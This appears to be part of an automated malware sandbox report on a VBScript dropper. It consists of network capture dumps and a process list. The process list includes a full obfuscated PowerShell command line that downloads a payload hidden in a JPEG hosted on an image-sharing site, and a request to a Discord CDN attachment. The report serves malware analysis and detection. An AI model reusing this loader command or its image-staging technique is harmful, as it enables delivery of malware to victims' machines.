0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd
        Data Ascii: Zr:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
        2024-05-27 13:21:02 UTC1369INData Raw: 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8
        Data Ascii: 1Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
        2024-05-27 13:21:02 UTC1369INData Raw: d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03
        Data Ascii: lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@
        2024-05-27 13:21:02 UTC1369INData Raw: b1 de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07
        Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hC


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.549706188.114.97.34431360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        2024-05-27 13:21:06 UTC100OUTGET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1
        Host: uploaddeimagens.com.br
        2024-05-27 13:21:06 UTC699INHTTP/1.1 200 OK
        Date: Mon, 27 May 2024 13:21:06 GMT
        Content-Type: image/jpeg
        Content-Length: 4201093
        Connection: close
        Last-Modified: Tue, 21 May 2024 16:07:14 GMT
        ETag: "664cc6b2-401a85"
        Cache-Control: max-age=2678400
        CF-Cache-Status: HIT
        Age: 3273
        Accept-Ranges: bytes
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OmCmlKHzJ%2FKutyPXcTz5CTdvQZHwjcg2%2BH3mM%2FRvBBB5iMSrpbkTyRyc%2BpQKfgqZA%2BmkaTpyNh79nGPb0wnxyAuV4ZOKv7ZW2LE21oly6r97Z1p9zCeX5Fy8fdsMfqQjA2XtD4lXTG05"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 88a64e616e4c32ca-EWR
        alt-svc: h3=":443"; ma=86400
        2024-05-27 13:21:06 UTC670INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
        2024-05-27 13:21:06 UTC1369INData Raw: c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc
        Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
        2024-05-27 13:21:06 UTC1369INData Raw: c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24
        Data Ascii: VH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$
        2024-05-27 13:21:06 UTC1369INData Raw: 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01
        Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
        2024-05-27 13:21:06 UTC1369INData Raw: 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e
        Data Ascii: >2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^
        2024-05-27 13:21:06 UTC1369INData Raw: cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1
        Data Ascii: 4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
        2024-05-27 13:21:06 UTC1369INData Raw: 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3
        Data Ascii: r:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
        2024-05-27 13:21:06 UTC1369INData Raw: dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae
        Data Ascii: Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
        2024-05-27 13:21:06 UTC1369INData Raw: 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce
        Data Ascii: lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@
        2024-05-27 13:21:06 UTC1369INData Raw: f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8
        Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.549708162.159.135.2334431360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        2024-05-27 13:21:16 UTC223OUTGET /attachments/1235627023511191643/1243619513031987362/upload.txt?ex=6652226d&is=6650d0ed&hm=e24f0e1fec60caad959ff854ae7583062889e47feb76e2fd76c0a79601ace128& HTTP/1.1
        Host: cdn.discordapp.com
        Connection: Keep-Alive
        2024-05-27 13:21:16 UTC1047INHTTP/1.1 404 Not Found
        Date: Mon, 27 May 2024 13:21:16 GMT
        Content-Type: text/plain;charset=UTF-8
        Content-Length: 36
        Connection: close
        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
        Set-Cookie: __cf_bm=XtWu8b_DL.uRh9fTgWs3VLmbsUgYn9pWKo0ZX5Ax1tc-1716816076-1.0.1.1-VqzG.1b2xao5e8StVsbRl_I3pGkd5FOcUjwGtJWLuFpHZzzUFP_dZKCoCgC7aFPiuk572FOjvvm44nJEY.WyNQ; path=/; expires=Mon, 27-May-24 13:51:16 GMT; domain=.discordapp.com; HttpOnly; Secure
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3sc%2BJ9ZTcDks5yH0i6vJm0dczQaxfC6v6qk65PMcQNRJOJVYj9H7Z%2FJmK7oawLNrXunr%2BpjbjuiQ20TvfbcCK1aymLqvkneGElrydTNwLhlzx5FhmjoYSEHtfMJdVpxuc1quAA%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Set-Cookie: _cfuvid=r.7G2AYBMLtcTxi40Hh6Pc2Z.gA3U5ZzXK.wmV6EI2s-1716816076857-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 88a64ea04f18438a-EWR
        alt-svc: h3=":443"; ma=86400
        2024-05-27 13:21:16 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
        Data Ascii: This content is no longer available.


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:09:20:57
        Start date:27/05/2024
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\upload.vbs"
        Imagebase:0x7ff67e450000
        File size:170'496 bytes
        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:2
        Start time:09:20:58
        Start date:27/05/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgT